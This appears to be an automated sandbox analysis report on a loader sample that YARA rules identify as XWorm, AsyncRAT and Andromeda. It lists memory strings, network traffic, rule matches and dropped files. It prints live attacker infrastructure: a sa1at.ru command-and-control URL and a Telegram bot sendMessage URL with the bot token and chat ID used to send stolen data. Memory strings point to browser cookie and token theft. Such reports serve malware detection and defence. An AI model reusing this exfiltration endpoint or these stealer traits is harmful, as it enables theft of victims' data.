                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://1.1.1.1/dns-query?name=sa1at.ru
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://1.1.1.1/dns-query?name=sa1at.ru7fd4917665566bc1c40a05008f60e4f674
                        Source: powershell.exe, 00000005.00000002.1005496636.000002B0BAE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1087717614.000002225ADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1218712283.0000028E45FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: svhost.exe, 00000003.00000002.2138122248.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegrP
                        Source: svhost.exe, 00000003.00000002.2138122248.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                        Source: svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://api.telegram.org/bot
                        Source: svhost.exe, 00000003.00000002.2138122248.000000000320E000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.0000000003200000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.000000000320C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ/sendMessage?chat_id=10998
                        Source: powershell.exe, 0000000D.00000002.1337892983.0000028E56013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000D.00000002.1337892983.0000028E56013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000D.00000002.1337892983.0000028E56013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: svchost.exe, 0000000F.00000003.1211505121.000001CB6D5E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                        Source: svchost.exe, 0000000F.00000003.1211505121.000001CB6D570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                        Source: powershell.exe, 0000000D.00000002.1218712283.0000028E461C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000005.00000002.1032821832.000002B0CAEA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1159859244.000002226AE23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1337892983.0000028E56013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002574000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000275E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D50000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B5C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EFE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024A2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.000000000188E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000029A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sa1at.ru/sa1at/
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sa1at.ru/sa1at/RepetitionDurationIntervalEndBoundaryRepetitionDurationInterval2025-03-11T12:
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sa1at.ru/sa1at/etext/html;
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024A2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.000000000188E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000049C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000029A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/etext/ht
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000029A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/htm
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000029A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html;
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49702 version: TLS 1.2
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmpBinary or memory string: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine unsafe.Pointerreflect.Value.RCodeNameErrorResourceHeaderunreachable: Accept-CharsetDkim-Signatureneed more dataREQUEST_METHODInstEmptyWidthmax-age=604800NO_VIABLE_PATHpacing limitedsqlite3_errstrsqlite3_errmsggo_commit_hookgo_update_hookgo_vtab_creatego_vtab_updatego_vtab_renamego_vtab_commitunixepoch_fracunixepoch_nano15:04:05Z07:00mime/multipartmutable-globalgo_sector_sizego_shm_barrierf32.demote_f64i32.extend16_si64.extend16_si64.extend32_sv128.load8x8_sv128.load8x8_uv128.bitselecti8x16.all_truei16x8.all_truei32x4.all_truei64x2.all_trueread block: %wfunc[%s.%s] %winvalid %s: %wunknown memoryalready closedI32WrapFromI64read value: %vsection %s: %vglobal[%d]: %wProcess32FirstWDispatchMessageSetWinEventHookHarmonyOutdatedchunk confirmedunzipping file winsta0\defaultgot dExec code:found tg:// urlActive window: Build Version: Browsers\Token_Network\Cookieszipinsecurepathrecord overflowbad certificatePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512ClientAuthType(client finishedserver finishedunknown versionmissing address/etc/mdns.allowunknown networknegative updateaccept-encodingaccept-languagex-forwarded-forAccept-Encodingrecv_rststream_Idempotency-KeyPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keywrite error: %wGetProcessTimesDuplicateHandlenegative offsetGetMonitorInfoW476837158203125advertise errorkey has expirednetwork is downno medium foundno such processGetAdaptersInfoCreateHardLinkWDeviceIoControlFlushViewOfFileGetCommandLineWGetStartupInfoWUnmapViewOfFileFailed to load Failed to find : cannot parse ,M3.2.0,M11.1.0general failuredata before FINbad close code ExcludeClipRectGetEnhMetaFileWGetTextMetricsWPlayEnhMetaFileGdiplusShutdownGetThreadLocaleOleUninitializewglGetCurrentDCDragAcceptFilesCallWindowProcWCreatePopupMenuCreateWindowExWDialogBoxParamWGetActiveWindowGetDpiForWindowGetRawInputDataInsertMenuItemWIsWindowEnabledIsWindowVisiblePostQuitMessageSetActiveWindowTrackMouseEventWindowFromPointDrawThemeTextExGetSecurityInfoImpersonateSelfOpenThreadTokenSetSecurityInfoAddDllDirectoryFindNextVolumeWFindVolumeCloseGetCommTimeoutsIsWow64Process2QueryDosDeviceWSetCommTimeoutsSetVolumeLabelWRtlDefaultNpAclCLSIDFromStringStringFromGUID2IsWindowUnicodetimeBeginPeriodNTSTATUS 0x%08xRegCreateKeyExWRegDeleteValueWx509usepoliciesNetworkSettingsRestartIntervalEvery other dayConsole Connectnothing to packIgnoring Retry.invalid boolean0601021504Z0700non-minimal tagunknown Go typeHanifi_RohingyaPsalter_Pahlavireflectlite.Set is unavailableallocmRInternalwrite heap dumpasyncpreemptoffforce gc (idle)sync.Mutex.Lockmalloc deadlockruntime error: elem size wrong with GC progmemstr_d0a56185-1

                        Operating System Destruction

                        barindex
                        Protects its processes via BreakOnTermination flag
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess information set: 01 00 00 00 Jump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: KoaguarLoader.exe, type: SAMPLEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: KoaguarLoader.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPEMatched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPEMatched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPEMatched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.KoaguarLoader.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.0.KoaguarLoader.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.KoaguarLoader.exe.409294.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.0.KoaguarLoader.exe.409294.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.KoaguarLoader.exe.409294.1.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.0.KoaguarLoader.exe.409294.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000000.868675253.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPEDMatched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPEDMatched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeCode function: 3_2_00007FF936A916F93_2_00007FF936A916F9
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeCode function: 3_2_00007FF936A96C623_2_00007FF936A96C62
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeCode function: 3_2_00007FF936A921813_2_00007FF936A92181
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeCode function: 3_2_00007FF936A95EB63_2_00007FF936A95EB6
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeCode function: 3_2_00007FF936A91EFD3_2_00007FF936A91EFD
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeCode function: 3_2_00007FF936A9265E3_2_00007FF936A9265E
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF936AB00AD5_2_00007FF936AB00AD
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF936AB10FA5_2_00007FF936AB10FA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF936B830E95_2_00007FF936B830E9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF936AB00AD10_2_00007FF936AB00AD
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF936B82E1110_2_00007FF936B82E11
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF936AB00AD13_2_00007FF936AB00AD
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 26_2_00007FF936A916F926_2_00007FF936A916F9
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 26_2_00007FF936A91EFD26_2_00007FF936A91EFD
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 26_2_00007FF936A900AD26_2_00007FF936A900AD
                        Source: KoaguarLoader.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Source: KoaguarLoader.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: KoaguarLoader.exe, 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvhost.exe4 vs KoaguarLoader.exe
                        Source: KoaguarLoader.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                        Source: KoaguarLoader.exe, type: SAMPLEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: KoaguarLoader.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPEMatched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPEMatched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPEMatched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPEMatched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPEMatched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPEMatched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
